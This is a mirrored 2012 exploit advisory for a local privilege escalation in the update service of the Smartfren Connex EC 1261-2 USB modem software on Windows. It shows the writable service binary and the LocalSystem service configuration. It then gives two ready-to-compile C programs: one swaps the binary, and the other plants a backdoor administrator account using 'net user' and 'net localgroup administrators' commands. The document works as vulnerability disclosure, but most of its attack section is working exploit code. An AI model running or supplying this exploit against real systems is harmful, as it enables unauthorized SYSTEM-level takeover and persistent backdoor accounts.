Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28585
HistoryOct 01, 2012 - 12:00 a.m.

Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability

2012-10-0100:00:00
vulners.com
10

==========================================================================
Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability

:-------------------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : Smartfren Connex EC 1261-2 UI OUC Local Privilege Escalation Vulnerability
: # Date : 26 September 2012
: # Author : X-Cisadane
: # Software Link : http://www.smartfren.com/data/ec1261.html
: # File Version : 21.005.15.03.836
: # Category : Desktop (Windows) Applications
: # Platform : Win32 & Win64
: # Vulnerability : Local Privilege Escalation Vulnerability
: # Tested On : Microsoft Windows 7 Ultimate 64 Bit (EN)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabarcyber, Winda utari
:-------------------------------------------------------------------------------------------------------------------------------------:
Summary

Smartfren Connex EC 1261-2 UI OUC is part of Smartfren Connex EC USB EVDO Modem files.
Smartfren Connex EC 1261-2 UI OUC is a daemon for updating the USB EVDO Modem files of Smartfren Connex.

Description

Improper file permissions on executable file of the application could result on Local Privilege Escalation Vulnerability.
It can be used by a simple user that can change the executable file with a binary of choice.
The binary (ouc.exe) is set by default to Startup and will be executed with SYSTEM privileges.
Tested on : Microsoft Windows 7 Ultimate 64 Bit (EN).

Proof of Concept

C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>>cacls ouc.exe
C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe Everyone:F
BUILTIN\Users:F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F

C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog>sc qc "Smartfren Connex EC1261-2 UI. RunOuc"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Smartfren Connex EC1261-2 UI. RunOuc
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Smartfren Connex EC1261-2 UI. OUC
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem


The following attack scenario could be used :

  1. An attacker (unprivileged user) rename Smartfren Connex EC1261-2 UI. OUC program file.
    For example, the Smartfren Connex EC1261-2 UI. OUC program file could be :
    For Win32 —> X:\Program Files\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager)
    For Win64 —> X:\Program Files (x86)\Smartfren Connex EC1261-2 UI\UpdateDog\ouc.exe (Smartfren Connex EC1261-2 UI Update Manager)
    Rename the file to ouc.exe.old
  2. An attacker copies his malicious executable file (with same name as the old filename of the FILE - ouc.exe) in the same location.
  3. Restart the system.
    After restart attackers malicious file will be executed with SYSTEM privileges.

You can also do it with these simple program :
------------------------------------- [ CUT HERE ] -------------------------------------------
Compile these script below with Dev-C++
Save in the C:\sploit.cpp

#include <stdio.h>
#include <windows.h>
#define DEFAULT_TARGET "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe"
#define DEFAULT_BACKUP "C:\\Program Files (x86)\\Smartfren Connex EC1261-2 UI\\UpdateDog\\ouc.exe.old"
#define DEFAULT_EXECUTE "C:\\bin.exe"
int main(int argc, char *argv[])
{

 MoveFile&#40;DEFAULT_TARGET, DEFAULT_BACKUP&#41;;
 CopyFile&#40;DEFAULT_EXECUTE, DEFAULT_TARGET, FALSE&#41;;
 return 0;

}

Compile these script below with Dev-C++
Save in the C:\bin.cpp

#include <stdio.h>
#include <windows.h>
#define CMD "C:\\WINDOWS\\system32\\cmd.exe"
#define ONE "/C net user xcisadane xcisadane /add"
#define TWO "/C net localgroup administrators xcisadane /add"
int main(int argc, char *argv[])
{
STARTUPINFO si = {sizeof(STARTUPINFO)};
PROCESS_INFORMATION pi;
CreateProcess(CMD, ONE, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
CreateProcess(CMD, TWO, NULL, NULL, 0, 0, NULL, NULL, &si, &pi);
return 0;
}
------------------------------------- [ CUT HERE ] -------------------------------------------
Execute file sploit.exe that located in C:\
Reboot your Windows. After reboot, let's check Net User from Command Prompt, if there an user with name xcisadane, so you have successfully!
P.S : For Win32 please change Program Files (x86) to Program Files.

Sent from my BlackBerry® smartphone from Sinyal Bagus XL, Nyambung Teruuusss…!